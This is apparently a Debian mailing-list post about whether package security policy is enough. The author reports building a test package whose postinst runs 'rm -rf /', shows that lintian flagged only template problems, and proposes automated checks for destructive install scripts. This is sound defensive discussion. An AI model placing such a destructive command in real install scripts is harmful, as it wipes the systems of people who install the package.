Does Debian need to enforce a better Security policy for packages?
I am looking into the security policies outlined for package
building, in order to include some notes regarding them in the section
"How does Debian handle security" in the "Securing Debian Manual"
For example, I have been recently asked if a maintainer can do
whatever he wishes in a package. Can he? Sure, we have policies, but what
if we have a debian developer distributing a trojan in a package. IMHO
lintian does check many issues regarding policy, but it does not test
potential security problems.
I just made an empty package with dh_make with only a postinst
having 'rm -rf /'. Lintian says:
$ lintian test-rm*deb
E: test-rm: description-is-dh_make-template
E: test-rm: helper-templates-in-copyright
W: test-rm: readme-debian-is-debmake-template
W: test-rm: unknown-section unknown
So. Since we do not source code audits of incoming packages and
this kind of issues are not detected automatically... does this leave
the Debian distribution open to attack if a developer box gets hacked
I can only imagine this kind of automatic test for correct package being
done using automatic installation on a controlled chrooted
environment before accepting incoming packages on the upload queues). And,
even so, events can be triggered only in some conditions.
Should we improve lintian in order to yell if some (destructive) action is
taken upon installation/de-installation? Should we further limit the kind
of commands available on this scripts? (BTW, this only tackles he problem
of installation scripts, not of the program itself...)